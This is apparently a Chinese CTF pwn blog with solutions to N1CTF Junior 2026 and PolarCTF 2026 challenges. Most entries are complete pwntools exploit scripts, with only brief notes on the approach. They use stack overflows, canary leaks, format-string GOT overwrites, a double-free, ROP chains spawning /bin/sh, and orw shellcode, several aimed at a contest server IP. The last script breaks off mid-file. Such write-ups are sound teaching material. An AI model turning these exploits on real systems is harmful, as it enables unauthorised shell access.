haoo's pwn house

N1CTF_Junior_2026_1/2

2026-03-31T09:22:59.549Z

ez_canary

这道题给了一个client文件和server文件。主要看一下server中的pwn_handler函数与gift函数

pwn_handler
unsigned __int64 __fastcall pwn_handler(__int64 fd)
{
  size_t n; // rax
  int v3; // [rsp+Ch] [rbp-24h] BYREF
  char s[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+28h] [rbp-8h]
  __int64 buf_; // [rsp+30h] [rbp+0h] BYREF

  v5 = __readfsqword(0x28u);
  v3 = 0;
  setvbuf(stdin, 0, 2, 0);
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stderr, 0, 2, 0);
  puts("Do you want to enter other functions?");
  __isoc99_scanf("%d", &v3);
  strcpy(s, "This is canary!");
  n = strlen(s);
  write(1, s, n);
  if ( v3 == 1 )
    gift();
  else
    read(0, &buf_, 0x10u);
  return __readfsqword(0x28u) ^ v5;
}

gift
unsigned __int64 gift()
{
  _BYTE buf[56]; // [rsp+0h] [rbp-40h] BYREF
  unsigned __int64 v2; // [rsp+38h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  read(0, buf, 0x200u);
  return __readfsqword(0x28u) ^ v2;
}

gift函数有明显的栈溢出，且存在canary保护。一开始不知道如何泄漏canary的值，因为只有5次交互，也不能进行canary的爆破，于是打算劫持__stack_chk_fail的got表，将其修改为ret的地址，从而即使检测到canary的值被修改，程序也不会终止退出。最后改完got表之后就是打ret2libc了。

发现当v3不等于1时，刚好可以修改rbp与返回地址，此时再看一下的gift函数的汇编代码：

text:0000000000401436                 endbr64
.text:000000000040143A                 push    rbp
.text:000000000040143B                 mov     rbp, rsp
.text:000000000040143E                 sub     rsp, 40h
.text:0000000000401442                 mov     rax, fs:28h
.text:000000000040144B                 mov     [rbp-8], rax
.text:000000000040144F                 xor     eax, eax
.text:0000000000401451                 lea     rax, [rbp-40h]
.text:0000000000401455                 mov     edx, 200h       ; nbytes
.text:000000000040145A                 mov     rsi, rax        ; buf
.text:000000000040145D                 mov     edi, 0          ; fd
.text:0000000000401462                 call    _read
.text:0000000000401467                 nop
.text:0000000000401468                 mov     rax, [rbp-8]
.text:000000000040146C                 xor     rax, fs:28h
.text:0000000000401475                 jz      short locret_40147C
.text:0000000000401477                 call    ___stack_chk_fail

可以看出写入的数据会存放在rbp-0x40处，因此输入的地址应该是target_addr + 0x40，这样相当于直接向target_addr输入数据了。原本打算是直接用__stack_chk_fail的got表(0x404040)作为target_addr，但是发现这样的话会出错，经过测试选择用0x404030作为target_addr。

p0 = p64(got_addr) + p64(gift_addr)
s(p0)

由于最后调用system(‘/bin/sh’)的时候需要很大的栈空间，因此打算将关键的payload写在bss段上，这里就又需要修改rbp了

p1 = p64(ret)*8 + p64(elf.bss(0x400)) + p64(gift_addr)
s(p1)

通过gift的汇编知道，是在输入数据后才会调用___stack_chk_fail，这里已经先修改了其got表，所以程序不会报错退出。既然成功修改了，后面就可以打ret2libc了，完整exp如下所示：

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./client'
libc_file='../libc-2.31.so'
elf=ELF('./server')
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='localhost'
    port=9999
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uu64    = lambda data : u64(data.ljust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

#gdb.attach(io)
ret = 0x40101a
gift_addr = 0x0401451
pop_rdi = 0x0401893
fini_addr = 0x04018B4
got_addr = elf.got['__stack_chk_fail'] - 0x10 + 0x40

sla("Do you want to enter other functions?",b"0")
p0 = p64(got_addr) + p64(gift_addr)
s(p0)
p1 = p64(ret)*8 + p64(elf.bss(0x400)) + p64(gift_addr)
s(p1)
pause()
p2 = p64(0)*9 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts'])
s(p2)

ru(b'This is canary!\n')
ru(b'[Server]: ')
libc_base = uu64(r(6)) - libc.sym['puts']
leak('libc_base',libc_base)
system = libc_base + libc.sym['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

io.close()

io = remote('localhost',9999)

sla("Do you want to enter other functions?",b"0")
p0 = p64(got_addr) + p64(gift_addr)
s(p0)
p1 = p64(ret)*8 + p64(elf.bss(0x800)) + p64(gift_addr)
s(p1)
pause()
p2 = p64(0)*9 + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(system)
s(p2)
#连接
#--------------------------------------------------------------------------------
ioi()

这道题还需注意的是需要添加一下pause()让交互慢一下，否则会有些小问题。

Onlyfgets

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[32]; // [rsp+0h] [rbp-20h] BYREF

  fgets(s, 500, stdin);
  return 0;
}

存在栈溢出，只开启了NX保护，got表可写。然后就没有其他什么东西了，因此这题大致的想法就是打ret2dlresolve

PolarCTF2026春季赛

2026-03-29T03:12:34.000Z

one_hundred

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./one_hundred'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2149
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

n_addr = 0x0804A06C
printf_got = elf.got["printf"]
system_plt = elf.plt["system"]


#gdb.attach(io,"b *0x08048642\nc")
p0 = p32(n_addr) + b"%96c%4$hn"
sl(p0)

p1 = fmtstr_payload(4,{printf_got:system_plt})
sl(p1)

#连接
#--------------------------------------------------------------------------------
ioi()

where_sh

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./where_sh'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2086
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

bss_addr = 0x0804A06C
gets_plt = elf.plt["gets"]
system_plt = elf.plt["system"]

p0 = b"%27$p"
sl(p0)
io.recvuntil(b"0x")
canary = i32(8)
leak("canary",canary)

p0 = cyclic(0x5c - 0xc) + p32(canary) + cyclic(0xc) + p32(gets_plt) + p32(system_plt) + p32(bss_addr) + p32(bss_addr)
sl(p0)
sl(b"/bin/sh\x00")
#连接
#--------------------------------------------------------------------------------
ioi()

z99

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./z99'
#libc_file=''
elf=ELF(pwn_file)
#ibc=ELF(libc_file)
#rop=ROP(libc)

flag=1
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2147
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))


z99_addr =0x000000000060108C

gdb.attach(io)
p0 = p64(0) * 3 + p64(0x21) + p64(0) + p64(z99_addr)
sl(p0)
sl(p64(0x11))
#连接
#--------------------------------------------------------------------------------
ioi()

2free

64位题目，开启了NX与canary保护，是一道堆题目。

发现delete函数中进行free后并没有将指针为空，那么这里就存在double free漏洞，且存在shell函数。那么大致的想法就是利用double free将printf的got表修改为shell函数的地址，执行show函数中printf的时候就相当于执行shell函数，从而获取shell了。

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./2free'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2106
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

def create(size):
    sla("4.show\n",b"1")
    sla("Size: \n",str(size))

def edit(index,content):
    sla("4.show\n",b"2")
    sla("Index: \n",str(index))
    sla("Contents: \n",content)

def delete(index):
    sla("4.show\n",b"3")
    sla("Index: \n",str(index))

def show(index):
    sl(b"4")
    sl(str(index))

shell_addr = 0x400C26
printf_got_addr = elf.got['printf']
back =printf_got_addr - 22

create(0x30)
create(0x30)

delete(0)
delete(1)
delete(0)
#gdb.attach(io)

create(0x30)
edit(0,p64(back))
create(0x30)
create(0x30)
create(0x30)
content = b'\x40\x00\x00\x00\x00\x00' + p64(shell_addr) + b"\x56\x07\x40\x00\x00\x00\x00\x00"
edit(5,content)
show(5)

#连接
#--------------------------------------------------------------------------------
ioi()

bank

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bank'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2069
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

money_addr = 0x0804A06C

p0 = p32(money_addr) + b"%9995c%6$hn"
sl(p0)

#连接
#--------------------------------------------------------------------------------
ioi()

littlecan

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./littlecan'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2109
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

#gdb.attach(io)
sl(b"\x00\x67")
sl(b"%31$p")

io.recvuntil("0x")
canary = int(io.recv(8), 16)
leak("canary", canary)

p0 = cyclic(0x70 - 0xc) + p32(canary) + cyclic(0xc) +p32(0x8048621)
sl(p0)
#连接
#--------------------------------------------------------------------------------
ioi()

sandbox1

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./sandbox1'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2098
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

bss_addr = elf.bss()+0x100
addr = 0x8108000

shellcode = orw('./flag',bss_addr,0x100)
sl(shellcode)
#连接
#--------------------------------------------------------------------------------
ioi()

zero

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='i386', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./zero'
#libc_file=''
elf=ELF(pwn_file)
#libc=ELF(libc_file)
#rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2139
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

polar_addr = 0x00002080 
io.recvuntil("0x")
base_addr=int(io.recv(8),16) - polar_addr
leak('base_addr',base_addr)
xin_addr = base_addr + 0x000008C0
p0 = cyclic(0x6c + 4) + p32(xin_addr)
sl(p0)
sl(b"$0")
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_canary

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug')#, terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_canary'
libc_file='./bllhl_canary.so.6'
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2092
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
i6      =lambda data: int(data, 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))


p0=b'%38$p.%39$p.%41$p.%49$p.kkkk'
s(p0)
ru("[echo] ")
a,b,c,libcbase,d=ru(b'k'*4).decode().split('.')
a=i6(a)
b=i6(b)
c=i6(c)
libcbase=i6(libcbase)-0x29d90

leak('a',a)
leak('b',b)
leak('c',c)
leak('libcbase',libcbase)

system = libcbase+libc.sym['system']
binsh = libcbase+next(libc.search(b'/bin/sh'))
rdi = libcbase+rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libcbase+rop.find_gadget(['ret'])[0]

p1 = b'b'*0x60+flat(a,b,0,c)+0x18*b'b'+flat(ret,rdi,binsh,system)
sl(p1)
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_fmt

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_fmt'
libc_file='./bllhl_fmt.so.6'
elf=ELF(pwn_file)
libc=ELF(libc_file)
rop=ROP(libc)

flag=0
if flag:
    io=process(pwn_file)
else:
    ip='1.95.36.136'
    port=2143
    io=remote(ip,port)

#设置自定义函数
#--------------------------------------------------------------------------------
#gdb调试
def debug():
    #gdb.attach(io)
    #gdb.attach(io,'b *$rebase(0x1234)')
    #gdb.attach(io,'b main')
    pause()
#lambda表达式
s = lambda data : io.send(data)
sa = lambda delim,data : io.sendafter(str(delim), data)
sl = lambda data : io.sendline(data)
sla = lambda delim,data : io.sendlineafter(str(delim), data)
r = lambda num : io.recv(num)
rl=lambda : io.recvline()
ru = lambda delims, drop = True : io.recvuntil(delims, drop)
leak = lambda name,addr : log.success('{} = {:#x}'.format(name, addr))
ur32 = lambda data: u32(io.recv(data).rjust(4,b'\x00'))
ur64 = lambda data : u64(io.recv(data).rjust(8,b'\x00'))
uul32 = lambda : u32(io.recvuntil(b'\xf7')[-4:].ljust(4,b'\x00'))
uul64 = lambda : u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
i32=lambda data: int(io.recv(data), 16)
i64=lambda data: int(io.recv(data), 16)
ioi     =   lambda                      : io.interactive()
#获取libc函数地址
def libc_func_addr(base,func):
    return base+libc.sym['func']
#简单的shellcode+orw
def shell():
    return asm(shellcraft.sh())
def orw(flag_file_name,addr,count):
    return asm(shellcraft.open(str(flag_file_name)) + shellcraft.read(3,addr,count) + shellcraft.write(1,addr,count))

p0 = b"%45$p+%43$p"
sl(p0)
io.recvuntil('0x')
addr_base = int(io.recv(12),16) - 0x0120E
io.recvuntil('+0x')
libc_base = int(io.recv(12),16) - 0x29d90
leak('addr_base',addr_base)
leak('libc_base',libc_base)

system = libc_base+libc.sym['system']
binsh = libc_base+next(libc.search(b'/bin/sh'))
rdi = libc_base+rop.find_gadget(['pop rdi', 'ret'])[0]
ret = libc_base+rop.find_gadget(['ret'])[0]

st = libc_base + libc.sym['environ']
p1 = b"kkkk%8$s" + p64(st)
sl(p1)
io.recvuntil('kkkk')
stack_addr = u64(io.recv(6).ljust(8,b'\x00')) - 0x120 - 0x130
leak('stack_addr',stack_addr)

add58 = libc_base+0x00000000000a0265
pay=fmtstr_payload(7,{stack_addr:add58},numbwritten=8,write_size='short')
pay=pay.ljust(0x50,b'b')+flat(rdi,binsh,ret,system)
sl(pay)
#连接
#--------------------------------------------------------------------------------
ioi()

bllhl_book

#导入所需库
#--------------------------------------------------------------------------------
from pwn import*
from LibcSearcher import*
from ctypes import*
from struct import*
import time

#设置context
#--------------------------------------------------------------------------------
context(arch='amd64', os='linux', log_level='debug', terminal=['tmux', 'splitw', '-h'])

#设置是否本地还是远程,并操作、解析相应文件
#--------------------------------------------------------------------------------
pwn_file='./bllhl_book'
libc_file='./bllhl_fmt.so.6'
elf=ELF(pwn_file)
